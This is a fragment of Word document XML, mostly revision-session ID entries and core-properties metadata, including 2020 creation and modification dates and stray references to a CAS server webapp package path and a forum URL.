    <w:rsid w:val="00843821"/>
    <w:rsid w:val="008B4875"/>
    <w:rsid w:val="008C4164"/>
    <w:rsid w:val="008C76D5"/>
    <w:rsid w:val="008C7939"/>
    <w:rsid w:val="008E509C"/>
    <w:rsid w:val="00922A02"/>
    <w:rsid w:val="00952D7A"/>
    <w:rsid w:val="009A2251"/>
    <w:rsid w:val="009B7530"/>
    <w:rsid w:val="009C1B0D"/>
    <w:rsid w:val="009C7594"/>
    <w:rsid w:val="009D4D68"/>
    <w:rsid w:val="009F688C"/>
    <w:rsid w:val="00A078A4"/>
    <w:rsid w:val="00A07F81"/>
    <w:rsid w:val="00A1104F"/>
    <w:rsid w:val="00A17B1A"/>
    <w:rsid w:val="00A259B6"/>
    <w:rsid w:val="00A829C7"/>
    <w:rsid w:val="00AA5DCE"/>
    <w:rsid w:val="00AD6115"/>
    <w:rsid w:val="00AD6177"/>
    <w:rsid w:val="00B15765"/>
    <w:rsid w:val="00B50CB7"/>
    <w:rsid w:val="00BA2E42"/>
    <w:rsid w:val="00BA7311"/>
    <w:rsid w:val="00BF2F15"/>
    <w:rsid w:val="00D170C8"/>
    <w:rsid w:val="00D21615"/>
    <w:rsid w:val="00DF0961"/>
    <w:rsid w:val="00DF7359"/>
    <w:rsid w:val="00E21DD8"/>
    <w:rsid w:val="00E62770"/>
    <w:rsid w:val="00E664DE"/>
    <w:rsid w:val="00F872A6"/>
    <w:rsid w:val="00F91C03"/>
    <w:rsid w:val="00FC7EB4"/>
    <w:rsid w:val="00FE6A07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40CB"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{44349FE2-D599-41A1-9E00-B44840E4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79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3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9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790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64790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63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E780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216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jasig/cas/cas-server-webapp/4.2.7/cas-server-webapp-4.2.7.wa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xz.aliyun.com/t/703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2020-01-19T01:52:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-05T06:05:00Z</dcterms:modified>
</cp:coreProperties>
</file>